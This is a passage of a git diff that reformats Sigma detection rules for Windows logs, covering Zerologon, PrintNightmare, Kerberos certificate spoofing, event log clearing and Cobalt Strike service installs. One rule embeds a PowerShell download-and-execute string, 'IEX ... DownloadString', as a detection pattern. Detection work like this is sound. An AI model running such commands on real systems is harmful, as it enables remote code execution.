4660 + EventID: 4660 # An object was deleted. ObjectName|contains: \Microsoft\Windows Defender\Exclusions\ condition: security and selection falsepositives: diff --git a/sigma/builtin/security/win_security_wmi_persistence.yml b/sigma/builtin/security/win_security_wmi_persistence.yml index 0c3b76b15..08dd71a04 100644 --- a/sigma/builtin/security/win_security_wmi_persistence.yml +++ b/sigma/builtin/security/win_security_wmi_persistence.yml @@ -1,11 +1,10 @@ title: WMI Persistence - Security id: f033f3f3-fd24-4995-97d8-a3bb17550a88 related: - - id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b - type: derived + - id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b + type: derived status: test -description: Detects suspicious WMI event filter and command line event consumer based - on WMI and Security Logs. +description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. references: - https://twitter.com/mattifestation/status/899646620148539397 - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ diff --git a/sigma/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml b/sigma/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml index 8c6991879..b7923eaec 100644 --- a/sigma/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml +++ b/sigma/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml @@ -1,8 +1,7 @@ title: T1047 Wmiprvse Wbemcomn DLL Hijack id: f6c68d5f-e101-4b86-8c84-7d96851fd65c status: test -description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` - directory over the network for a WMI DLL Hijack scenario. +description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR) diff --git a/sigma/builtin/security/win_security_workstation_was_locked.yml b/sigma/builtin/security/win_security_workstation_was_locked.yml index d63469618..5a976fed5 100644 --- a/sigma/builtin/security/win_security_workstation_was_locked.yml +++ b/sigma/builtin/security/win_security_workstation_was_locked.yml @@ -1,8 +1,7 @@ title: Locked Workstation id: 411742ad-89b0-49cb-a7b0-3971b5c1e0a4 status: stable -description: Detects locked workstation session events that occur automatically after - a standard period of inactivity. +description: Detects locked workstation session events that occur automatically after a standard period of inactivity. references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf @@ -11,6 +10,30 @@ references: author: Alexandr Yampolskyi, SOC Prime date: 2019/03/26 modified: 2023/12/11 +# tags: + # - CSC16 + # - CSC16.11 + # - ISO27002-2013 A.9.1.1 + # - ISO27002-2013 A.9.2.1 + # - ISO27002-2013 A.9.2.2 + # - ISO27002-2013 A.9.2.3 + # - ISO27002-2013 A.9.2.4 + # - ISO27002-2013 A.9.2.5 + # - ISO27002-2013 A.9.2.6 + # - ISO27002-2013 A.9.3.1 + # - ISO27002-2013 A.9.4.1 + # - ISO27002-2013 A.9.4.3 + # - ISO27002-2013 A.11.2.8 + # - PCI DSS 3.1 7.1 + # - PCI DSS 3.1 7.2 + # - PCI DSS 3.1 7.3 + # - PCI DSS 3.1 8.7 + # - PCI DSS 3.1 8.8 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.PT-3 logsource: product: windows service: security diff --git a/sigma/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml b/sigma/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml index c044efc73..4e5d7d52a 100644 --- a/sigma/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml +++ b/sigma/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml @@ -1,9 +1,7 @@ title: Microsoft Defender Blocked from Loading Unsigned DLL id: 0b0ea3cc-99c8-4730-9c53-45deee2a4c86 status: test -description: Detects Code Integrity (CI) engine blocking Microsoft Defender's processes - (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload - arbitrary DLL +description: Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj @@ -21,7 +19,7 @@ detection: selection: EventID: - 11 - - 12 + - 12 # MDE: ExploitGuardNonMicrosoftSignedBlocked ProcessPath|endswith: - \MpCmdRun.exe - \NisSrv.exe diff --git a/sigma/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml b/sigma/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml index bc68a23ad..2e3edbb2e 100644 --- a/sigma/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml +++ b/sigma/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml @@ -1,8 +1,7 @@ title: Unsigned Binary Loaded From Suspicious Location id: 8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10 status: test -description: Detects Code Integrity (CI) engine blocking processes from loading unsigned - DLLs residing in suspicious locations +description: Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations references: - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/shell_core/win_shell_core_susp_packages_installed.yml b/sigma/builtin/shell_core/win_shell_core_susp_packages_installed.yml index 2a3af6aab..6a710760f 100644 --- a/sigma/builtin/shell_core/win_shell_core_susp_packages_installed.yml +++ b/sigma/builtin/shell_core/win_shell_core_susp_packages_installed.yml @@ -1,8 +1,7 @@ title: Suspicious Application Installed id: 83c161b6-ca67-4f33-8ad0-644a0737cf07 status: test -description: Detects suspicious application installed by looking at the added shortcut - to the app resolver cache +description: Detects suspicious application installed by looking at the added shortcut to the app resolver cache references: - https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3 author: Nasreddine Bencherchali (Nextron Systems) @@ -18,6 +17,7 @@ detection: selection_name: EventID: 28115 Name|contains: + # Please add more - Zenmap - AnyDesk - wireshark @@ -25,8 +25,9 @@ detection: selection_packageid: EventID: 28115 AppID|contains: + # Please add more - zenmap.exe - - prokzult ad + - prokzult ad # AnyDesk - wireshark - openvpn condition: shell_core and (1 of selection_*) diff --git a/sigma/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml b/sigma/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml index 4551cccbf..82966e0cd 100644 --- a/sigma/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml +++ b/sigma/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml @@ -1,8 +1,7 @@ title: Suspicious Rejected SMB Guest Logon From IP id: 71886b70-d7b4-4dbf-acce-87d2ca135262 status: test -description: Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in - Windows Spooler Service +description: Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service references: - https://twitter.com/KevTheHermit/status/1410203844064301056 - https://github.com/hhlxf/PrintNightmare diff --git a/sigma/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml b/sigma/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml index b8238d0f0..13b09e9cc 100644 --- a/sigma/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml +++ b/sigma/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml @@ -1,9 +1,7 @@ title: NTLMv1 Logon Between Client and Server id: e9d4ab66-a532-4ef7-a502-66a9e4a34f5d status: experimental -description: Detects the reporting of NTLMv1 being used between a client and server. - NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced - by modern hardware. +description: Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware. references: - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml author: Tim Shelton, Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml b/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml index 8d40844b5..6cbdbbf3c 100644 --- a/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml +++ b/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml @@ -1,8 +1,7 @@ title: DHCP Server Loaded the CallOut DLL id: 13fc89a9-971e-4ca6-b9dc-aa53a445bf40 status: test -description: This rule detects a DHCP server in which a specified Callout DLL (in - registry) was loaded +description: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded references: - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx diff --git a/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml b/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml index 6406984b6..097406372 100644 --- a/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml +++ b/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml @@ -1,8 +1,7 @@ title: DHCP Server Error Failed Loading the CallOut DLL id: 75edd3fd-7146-48e5-9848-3013d7f0282c status: test -description: This rule detects a DHCP server error in which a specified Callout DLL - (in registry) could not be loaded +description: This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded references: - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx diff --git a/sigma/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml b/sigma/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml index 12187b99c..ea053bd98 100644 --- a/sigma/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml +++ b/sigma/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml @@ -1,18 +1,13 @@ title: Potential CVE-2021-42287 Exploitation Attempt id: e80a0fee-1a62-4419-b31e-0d0db6e6013a related: - - id: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f - type: similar + - id: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f + type: similar status: test -description: 'The attacker creates a computer object using those permissions with - a password known to her. - +description: | + The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. - - Because she created the object (CREATOR OWNER), she gets granted additional permissions - and can do many changes to the object. - - ' + Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object. references: - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/ author: frack113 @@ -28,10 +23,10 @@ detection: system: Channel: System selection: - Provider_Name: Microsoft-Windows-Directory-Services-SAM + Provider_Name: Microsoft-Windows-Directory-Services-SAM # Active Directory EventID: - - 16990 - - 16991 + - 16990 # Object class and UserAccountControl validation failure + - 16991 # SAM Account Name validation failure condition: system and selection falsepositives: - Unknown diff --git a/sigma/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml b/sigma/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml index 497202f25..d4d1655df 100644 --- a/sigma/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml +++ b/sigma/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml @@ -1,8 +1,7 @@ title: Local Privilege Escalation Indicator TabTip id: bc2e25ed-b92b-4daa-b074-b502bdd1982b status: experimental -description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG - is used on a system in brute force mode +description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode references: - https://github.com/antonioCoco/JuicyPotatoNG author: Florian Roth (Nextron Systems) @@ -20,9 +19,9 @@ detection: selection: Provider_Name: Microsoft-Windows-DistributedCOM EventID: 10001 - param1: C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe - param2: 2147943140 - param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}' + param1: C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe # Binary starting/started + param2: 2147943140 # ERROR id + param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}' # DCOM Server condition: system and selection falsepositives: - Unknown diff --git a/sigma/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml b/sigma/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml index 081afcad6..864fb77a0 100644 --- a/sigma/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml +++ b/sigma/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml @@ -1,15 +1,14 @@ title: Eventlog Cleared id: a62b37e0-45d3-48d9-a517-90c1a1b0186b related: - - id: f2f01843-e7b8-4f95-a35a-d23584476423 - type: obsoletes - - id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 - type: derived - - id: 100ef69e-3327-481c-8e5c-6d80d9507556 - type: derived + - id: f2f01843-e7b8-4f95-a35a-d23584476423 + type: obsoletes + - id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 + type: derived + - id: 100ef69e-3327-481c-8e5c-6d80d9507556 + type: derived status: experimental -description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil - cl" command execution +description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution references: - https://twitter.com/deviouspolack/status/832535435960209408 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 @@ -30,6 +29,7 @@ detection: EventID: 104 Provider_Name: Microsoft-Windows-Eventlog filter_main_covered: + # The channels below are already covered by the rule 100ef69e-3327-481c-8e5c-6d80d9507556 Channel: - Microsoft-Windows-PowerShell/Operational - Microsoft-Windows-Sysmon/Operational @@ -39,8 +39,7 @@ detection: - Windows PowerShell condition: system and (selection and not 1 of filter_main_*) falsepositives: - - Rollout of log collection agents (the setup routine often includes a reset of - the local Eventlog) + - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - System provisioning (system reset before the golden image creation) level: medium ruletype: Sigma diff --git a/sigma/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml b/sigma/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml index edb0bee55..8f8642ee1 100644 --- a/sigma/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml +++ b/sigma/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml @@ -1,16 +1,14 @@ title: Important Windows Eventlog Cleared id: 100ef69e-3327-481c-8e5c-6d80d9507556 related: - - id: a62b37e0-45d3-48d9-a517-90c1a1b0186b - type: derived + - id: a62b37e0-45d3-48d9-a517-90c1a1b0186b + type: derived status: experimental -description: Detects the clearing of one of the Windows Core Eventlogs. e.g. caused - by "wevtutil cl" command execution +description: Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution references: - https://twitter.com/deviouspolack/status/832535435960209408 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 -author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron - Systems) +author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2022/05/17 modified: 2023/11/15 tags: @@ -35,8 +33,7 @@ detection: - Windows PowerShell condition: system and selection falsepositives: - - Rollout of log collection agents (the setup routine often includes a reset of - the local Eventlog) + - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - System provisioning (system reset before the golden image creation) level: high ruletype: Sigma diff --git a/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml b/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml index 1a216a9f2..3ccf8b7de 100644 --- a/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml +++ b/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml @@ -1,18 +1,10 @@ title: Certificate Use With No Strong Mapping id: 993c2665-e6ef-40e3-a62a-e1a97686af79 status: experimental -description: 'Detects a user certificate that was valid but could not be mapped to - a user in a strong way (such as via explicit mapping, key trust mapping, or a - SID) - - This could be a sign of exploitation of the elevation of privilege vulnerabilities - (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows - certificate spoofing by not requiring a strong mapping. - - Events where the AccountName and CN of the Subject do not match, or where the - CN ends in a dollar sign indicating a machine, may indicate certificate spoofing. - - ' +description: | + Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID) + This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. + Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing. references: - https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16 author: '@br4dy5' @@ -29,12 +21,10 @@ detection: Provider_Name: Kerberos-Key-Distribution-Center EventID: - 39 - - 41 + - 41 # For Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 condition: system and selection falsepositives: - - If prevalent in the environment, filter on events where the AccountName and - CN of the Subject do not reference the same user - - If prevalent in the environment, filter on CNs that end in a dollar sign indicating - it is a machine name + - If prevalent in the environment, filter on events where the AccountName and CN of the Subject do not reference the same user + - If prevalent in the environment, filter on CNs that end in a dollar sign indicating it is a machine name level: medium ruletype: Sigma diff --git a/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml b/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml index e8007e590..c088a448c 100644 --- a/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml +++ b/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml @@ -1,8 +1,7 @@ title: KDC RC4-HMAC Downgrade CVE-2022-37966 id: e6f81941-b1cd-4766-87db-9fc156f658ee status: test -description: Detects the exploitation of a security bypass and elevation of privilege - vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation +description: Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation references: - https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d author: Florian Roth (Nextron Systems) @@ -18,7 +17,7 @@ detection: selection: EventID: 42 Provider_Name: Kerberos-Key-Distribution-Center - Level: 2 + Level: 2 # Error condition: system and selection falsepositives: - Unknown diff --git a/sigma/builtin/system/microsoft_windows_kernel_general/win_system_susp_sam_dump.yml b/sigma/builtin/system/microsoft_windows_kernel_general/win_system_susp_sam_dump.yml index b6daaa4e6..c04a533e4 100644 --- a/sigma/builtin/system/microsoft_windows_kernel_general/win_system_susp_sam_dump.yml +++ b/sigma/builtin/system/microsoft_windows_kernel_general/win_system_susp_sam_dump.yml @@ -1,8 +1,7 @@ title: SAM Dump to AppData id: 839dd1e8-eda8-4834-8145-01beeee33acd status: test -description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other - password dumpers +description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers author: Florian Roth (Nextron Systems) date: 2018/01/27 modified: 2023/04/30 diff --git a/sigma/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml b/sigma/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml index 20481ca85..0fab3be41 100644 --- a/sigma/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml +++ b/sigma/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml @@ -1,10 +1,7 @@ title: Suspicious Usage of CVE_2021_34484 or CVE 2022_21919 id: 52a85084-6989-40c3-8f32-091e12e17692 status: experimental -description: During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User - Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with - this event) are created. Moreover, it appears the directory \Users\TEMP is created - may be created during the exploitation. Viewed on 2008 Server +description: During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \Users\TEMP is created may be created during the exploitation. Viewed on 2008 Server references: - https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html author: Cybex diff --git a/sigma/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml b/sigma/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml index 6f946df64..ea7667a83 100644 --- a/sigma/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml +++ b/sigma/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml @@ -1,8 +1,7 @@ title: Windows Update Error id: 13cfeb75-9e33-4d04-b0f7-ab8faaa95a59 status: stable -description: Detects Windows update errors including installation failures and connection - issues. Defenders should observe this in case critical update KB aren't installed. +description: Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KB aren't installed. author: frack113 date: 2021/12/04 modified: 2023/09/07 @@ -19,11 +18,11 @@ detection: selection: Provider_Name: Microsoft-Windows-WindowsUpdateClient EventID: - - 16 - - 20 - - 24 - - 213 - - 217 + - 16 # Unable to Connect: Windows is unable to connect to the automatic updates service and therefore cannot download and install updates according to the set schedule + - 20 # Installation Failure: Windows failed to install the following update with error + - 24 # Uninstallation Failure: Windows failed to uninstall the following update with error + - 213 # Revert Failure: Windows failed to revert the following update with error + - 217 # Commit Failure: Windows failed to commit the following update with error condition: system and selection falsepositives: - Unknown diff --git a/sigma/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml b/sigma/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml index 4b9b1d436..fc623dd6b 100644 --- a/sigma/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml +++ b/sigma/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml @@ -1,9 +1,7 @@ title: Zerologon Exploitation Using Well-known Tools id: 18f37338-b9bd-4117-a039-280c81f7a596 status: stable -description: This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) - vulnerability using mimikatz zerologon module or other exploits from machine with - "kali" hostname. +description: This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname. references: - https://www.secura.com/blog/zero-logon - https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382 diff --git a/sigma/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml b/sigma/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml index cd3ef2406..f1efb2408 100644 --- a/sigma/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml +++ b/sigma/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml @@ -1,8 +1,7 @@ title: Vulnerable Netlogon Secure Channel Connection Allowed id: a0cb7110-edf0-47a4-9177-541a4083128a status: test -description: Detects that a vulnerable Netlogon secure channel connection was allowed, - which could be an indicator of CVE-2020-1472. +description: Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472. references: - https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc author: NVISO @@ -18,7 +17,7 @@ detection: system: Channel: System selection: - Provider_Name: NetLogon + Provider_Name: NetLogon # Active Directory: NetLogon ETW GUID {F33959B4-DBEC-11D2-895B-00C04F79AB69} EventID: 5829 condition: system and selection falsepositives: diff --git a/sigma/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml b/sigma/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml index d270e9078..cd5a4de3c 100644 --- a/sigma/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml +++ b/sigma/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml @@ -1,8 +1,7 @@ title: NTFS Vulnerability Exploitation id: f14719ce-d3ab-4e25-9ce6-2899092260b0 status: test -description: This the exploitation of a NTFS vulnerability as reported without many - details via Twitter +description: This the exploitation of a NTFS vulnerability as reported without many details via Twitter references: - https://twitter.com/jonasLyk/status/1347900440000811010 - https://twitter.com/wdormann/status/1347958161609809921 diff --git a/sigma/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml b/sigma/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml index 2ff5f936e..e7d3ccc22 100644 --- a/sigma/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml +++ b/sigma/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml @@ -1,8 +1,7 @@ title: CobaltStrike Service Installations - System id: 5a105d34-05fc-401e-8553-272b45c1522d status: test -description: Detects known malicious service installs that appear in cases in which - a Cobalt Strike beacon elevates privileges or lateral movement +description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement references: - https://www.sans.org/webcasts/119395 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ @@ -38,9 +37,8 @@ detection: selection3: ImagePath|contains: powershell -nop -w hidden -encodedcommand selection4: - ImagePath|base64offset|contains: 'IEX (New-Object Net.Webclient).DownloadString(''http://127.0.0.1:' - condition: system and (selection_id and (selection1 or selection2 or selection3 - or selection4)) + ImagePath|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" + condition: system and (selection_id and (selection1 or selection2 or selection3 or selection4)) falsepositives: - Unknown level: critical diff --git a/sigma/builtin/system/service_control_manager/win_system_defender_disabled.yml b/sigma/builtin/system/service_control_manager/win_system_defender_disabled.yml index 82c11939b..510bdff18 100644 --- a/sigma/builtin/system/service_control_manager/win_system_defender_disabled.yml +++ b/sigma/builtin/system/service_control_manager/win_system_defender_disabled.yml @@ -1,14 +1,14 @@ title: Windows Defender Threat Detection Disabled - Service id: 6c0a7755-6d31-44fa-80e1-133e57752680 related: - - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 - type: derived + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: derived status: stable description: Detects the "Windows Defender Threat Protection" service has been disabled references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/08/08 tags: @@ -23,12 +23,13 @@ detection: selection: EventID: 7036 Provider_Name: Service Control Manager + # Note: The service name and messages are localized param1: - Windows Defender Antivirus Service - - Service antivirus Microsoft Defender + - Service antivirus Microsoft Defender # French OS param2: - stopped - - "arr\xEAt\xE9" + - arrêté condition: system and selection falsepositives: - Administrator actions diff --git a/sigma/builtin/system/service_control_manager/win_system_hack_smbexec.yml b/sigma/builtin/system/service_control_manager/win_system_hack_smbexec.yml index 922d21095..502aba028 100644 --- a/sigma/builtin/system/service_control_manager/win_system_hack_smbexec.yml +++ b/sigma/builtin/system/service_control_manager/win_system_hack_smbexec.yml @@ -5,7 +5,7 @@ description: Detects the use of smbexec.py tool by detecting a specific service references: - https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/ - https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296 - - https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60 + - https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60 # Old service name author: Omer Faruk Celik date: 2018/03/20 modified: 2023/11/09 diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml index 1f05023e6..294dbc4fa 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml @@ -3,7 +3,7 @@ id: f7385ee2-0e0c-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of Clip.exe to execute 